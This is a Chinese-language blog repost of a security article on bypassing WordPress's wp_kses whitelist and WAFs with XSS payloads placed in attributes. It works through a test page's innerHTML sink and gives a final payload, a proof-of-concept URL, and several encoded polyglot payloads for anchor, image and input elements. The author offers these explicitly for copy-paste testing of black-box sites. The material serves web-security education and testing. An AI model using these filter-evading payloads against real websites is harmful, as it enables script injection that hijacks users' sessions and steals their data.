使用属性中的 XSS 负载绕过白名单
myzbx 2024-12-12 13:39 28 浏览
在一些 XSS 场景中,有一个强大的过滤器,例如WordPress 的 KSES。与许多其他过滤器一样,该过滤器使用白名单方法,仅允许对应用程序无害的 HTML。默认情况下,它只允许基本格式标签(如 <b>、<i> 等)、链接 <a href=URL>、图像 <img src=URL>、表格和其他几个具有可执行 JavaScript 属性的 HTML 元素。
不用说,不允许使用任何脚本元素或事件处理程序。任何需要 URL 的属性中都不允许使用伪协议“javascript:”。针对这些过滤器的 XSS 攻击只有 0-day 才有可能,鉴于使用这些过滤器和库的应用程序的暴露程度,该漏洞可能很快就会得到修复。
然而,由于任何安全漏洞的起源,事情可能会变得更加复杂,并且会出现错误。为了说明无论是否存在此类过滤器,XSS 漏洞仍然可能存在,我们创建了一个测试页面并发布在@BRuteLogic 的 X 时间线上。
https://brutelogic.com.br/dom/wp-search.php
您可以暂停阅读并尝试一下,然后再继续阅读。也可以与他人分享:
你能 #XSS 我吗?https://brutelogic.com.br/dom/wp-search.php #hack2learn
弹出警告框
通过一些初步的“反复试验”,我们可能会注意到 WordPress 的 wp_kses() 函数的存在。只要有了这个过滤器,就可以使用双引号突破输入元素(搜索表单)的值属性。值得注意的是,此时任何带有事件处理程序的内联注入都会被另一个过滤器避免,从而导致“[FORBIDDEN]”反射。
要关闭当前元素以注入新元素,需要一个完整的允许标签,而不仅仅是小于号(>)。
从当前元素退出后,可以添加任何允许的元素,如锚点 (<a href>)。
现在,没有任何其他帮助,这里就不可能出现 XSS。Wp_kses() 在过滤所有恶意内容方面做得很好,但正如前面指出的那样,应用程序本身可能会把事情搞得一团糟。
检查源代码,发现页面中加载了一个名为“script.js”的脚本:
它包含一个非常简短的代码:
它只获取页面的第一个锚点(数组的 [0]),并使用“innerHTML”属性将其 href 值(URL)分配给其内容。令人惊讶的是,这为通过向锚点的 href 属性中注入某些内容(wp_kses() 允许)提供了足够的空间来逃避过滤器(甚至 WAF)。
请注意,使用HTML 实体成功将 <s> 元素注入 DOM 。这是因为它是通过 linkURL() 函数的 innerHTML 插入到那里的。这足以避开 wp_kses 以及通常大多数 WAF。
虽然 <svg> 元素已成功注入,但事件处理程序触发了另一个过滤器,将“onload”替换为“[FORBIDDEN]”。所使用的有效载荷还需要进行一些编码,以避免“on.*”过滤器检测。
现在 <svg> 有效载荷已被完全注入。
最终有效载荷:
"<s><a href=//%26lt;svg/o%26%2378;load=alert(1)%26gt;>
概念验证:
https://brutelogic.com.br/dom/wp-search.php?search=XSS%22%3Cs%3E%3Ca+href=//%26lt;svg/o%26%2378;load=alert(1 )%26gt;%3E
要复制 + 粘贴的有效载荷
上述有效载荷可以优化,以在更多涉及 DOM 插入的场景中工作。它们可用于立即测试黑盒,而无需检查任何 javascript 代码。它可能对 wp_kses 和其他白名单过滤器/库有效,而且肯定对 WAF 有效。
以下多语言有效载荷可确保它会在几种可能的情况下弹出:
锚
1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt;名称=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;错误=alert(1)//%26gt; 类别=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;错误=alert(1)//%26gt; >
它使用带有编码引号和注释块的简短多语言。点击此处了解有关多语言技巧的更多信息。它还将有效载荷喷洒到元素的几个常见属性上。使用“tel:”方案是因为它很短,并且最适合使用 href 加单斜杠(但有些页面可能要求带或不带双斜杠的“https:”)。
这是一个很长的向量,但这不是问题,因为它主要是 HTML 编码的(通常被过滤器容忍)。除了强制性的“href”属性外,其他一些属性可以随意省略。
更多有效载荷:
图像
1'"<S><Img Src=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt;名称 = tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; 类别 = tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
输入
1'"<S><输入值=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt;名称=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt;类别=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; PlaceHolder=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
所有这些有效载荷都与原生“id”属性配合使用效果最佳:通常在像上面这样的易受攻击的 javascript 代码中,元素数组的第一个元素不会被拾取。尽管对于所有类似元素,document.getElementsByTagName(element) 函数可能会在野外发生(特别是对于具有大量动态检索链接的页面),但 document.getElementById(id) 函数更有可能在源代码中找到属性“id”的值时出现。
由于无法喷射“id”属性,因此需要添加该属性才能针对此类易受攻击的情况进行有针对性的利用。另一方面,添加的“class”属性支持使用页面中找到的所有类名进行喷射技术,因为它可以接受多个值。
译:https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/
- 上一篇:所见即所得的 Markdown 编辑器
- 下一篇:浏览器中的虚拟现实和增强现实
相关推荐
- 砌体植筋拉拔试验检验值到底是6.0KN,还是10.2KN,如何计算确定
-
砌体拉结筋植筋养护完成后,需对所植钢筋进行拉拔试验,以检验植筋的锚固强度是否满足设计要求。检测时,按照一定的抽样比例进行拉拔试验。根据《混凝土结构后锚固技术规程》JGJ145-2013,以同品种、同...
- 柴油机功率如何计算?计算柴油机功率需要哪些参数?
-
在汽车领域,对于柴油机功率的计算是一项重要的工作,它有助于我们更好地了解柴油机的性能和适用场景。下面我们就来详细探讨一下柴油机功率的计算方法以及所需的参数。首先,我们要了解计算柴油机功率常用的公式。在...
- 变压器短路阻抗的作用和计算方法(变压器短路阻抗的作用和计算方法是什么)
-
变压器短路阻抗的作用和计算方法短路阻抗是在负载试验中测量的一项数据,它是二次侧短接并流过额定电流时,一次侧施加的电压与额定电压的的百分数。那么测量变压器的短路阻抗有什么意义呢?其实变压器的阻抗电压乃是...
- 9.35m层高高支模支撑架计算书(支模架多高属于高支模)
-
某工厂新扩建的建筑面积为1989.2m^2,建筑物总体分为2层,但局部为4层。建筑物檐高19.4m,建筑物总高23m。建筑物呈长方形设置,长度为48.20m,宽度为23.88m,结构形式为框架结构...
- 吊篮(悬挂装置前梁加长)安全复核计算书
-
吊篮(悬挂装置前梁加长)安全复核计算书一种超常规搭设的高处作业吊篮,因使用要求将吊篮悬挂装置前梁加长设置,本计算书针对这种工况的校核,以作参考。计算依据:1、《高处作业吊篮》GB/T19155-...
- 电功率计算公式精编汇总(电功率计算视频讲解)
-
一、电功率计算公式:1在纯直流电路中:P=UIP=I2RP=U2/R式中:P---电功率(W),U---电压(V),I----电流(A),R---电阻(Ω)。2在单相交流电路中:P=UIcosφ...
- 灌注桩承载力检测方法及步骤(灌注桩承载力不够怎么办)
-
检测灌注桩的承载力是确保基础工程安全可靠的关键环节,检测结果的精细能准确为我们提供可靠的数据,让我们能准确判断桩基础的承载力,方便后续施工安排,同样也能让我们根据数据分辨出有问题桩基,采取可靠有效的措...
- 很哇塞的体积计算方法:向量叉乘 很哇塞的体积计算方法
-
高中数学必看:向量叉乘,体积的神。大家都知道a、b的向量是什么意思,但是a、b的向量又是什么?很多同学都不知道,向量的向量在高中阶段非常有用,虽然它是大学的知识,在高中阶段可以干两件事。·第一件事,表...
- 施工升降机基础(设置在地库顶板回顶)计算书
-
施工升降机基础(设置在地库顶板回顶)计算书计算依据:1、《施工现场设施安全设计计算手册》谢建民编著2、《建筑地基基础设计规范》GB50007-20113、《混凝土结构设计标准》GB/T50010-2...
- 剪力墙水平钢筋根数如何计算?(剪力墙水平钢筋绑扎搭接规范)
-
剪力墙水平钢筋根数的计算需综合考虑墙高、起步距离、间距及构造要求等因素,具体步骤如下及依据:1.基本计算公式水平钢筋根数计算公式为:根数=(墙高-起步距离)/间距(墙高-起步距离)/间距...
- 直流电路常用计算公式(直流电路常用计算公式有哪些)
-
1、电阻导体阻碍电流通过的能力叫做电阻,用字母R表示,单位欧(Ω)。R=ρl/s式中R-导体的电阻,欧(Ω);ρ-导体的电阻率,欧·米(Ω·m);l-导体的长度,米(m);s-导体的截面积,平方米(m...
- 电气主电路图的绘制特点(电气原理图主电路)
-
1、电气主电路图中的电气设备、元件,如电源进线、变压器、隔离开关、断路器、熔断器、避雷器等都垂直绘制,而母线则水平绘制。电气主电路图除特殊情况外,几乎无一例外地画成单线图,并以母线为核心将各个项目(如...
- 中考总复习:物理专题 功和机械能 (功的计算、功率、动能、势能)
-
中考物理专题:功与机械能解析一、力学中的功——能量转化的桥梁功是力对物体能量变化的量度,需满足两要素:作用在物体上的力、物体沿力方向移动距离。例如推箱子时,若箱子未移动,推力不做功;若箱子滑动,推力做...
- 40亿QQ号,不超过1G内存,如何去重?
-
分享一道网上很火的面试题:40亿QQ号,不超过1G的内存,如何去重?这是一个非常经典的海量数据去重问题,并且做了内存限制,最多只能1GB,本文跟大家探讨一下~~一、常规思路我们日常开发中,如果谈到去重...
- 填充墙体拉结筋植筋深度、孔径、拉拔试验承载力计算!
-
今天分享下植筋间距及保护层要求:根据JGJ145-2013混凝土后锚固技术规程要求植筋与混凝土结构边缘不应小于5mm,植筋为两根及以上时水平间距为不应小于5d(d为钢筋直径)。根据混凝土结构后锚固技...
- 一周热门
- 最近发表
- 标签列表
-
- HTML 简介 (30)
- HTML 响应式设计 (31)
- HTML URL 编码 (32)
- HTML Web 服务器 (31)
- HTML 表单属性 (32)
- HTML 音频 (31)
- HTML5 支持 (33)
- HTML API (36)
- HTML 总结 (32)
- HTML 全局属性 (32)
- HTML 事件 (31)
- HTML 画布 (32)
- HTTP 方法 (30)
- 键盘快捷键 (30)
- CSS 语法 (35)
- CSS 轮廓宽度 (31)
- CSS 谷歌字体 (33)
- CSS 链接 (31)
- CSS 定位 (31)
- CSS 图片库 (32)
- CSS 图像精灵 (31)
- SVG 文本 (32)
- 时钟启动 (33)
- HTML 游戏 (34)
- JS Loop For (32)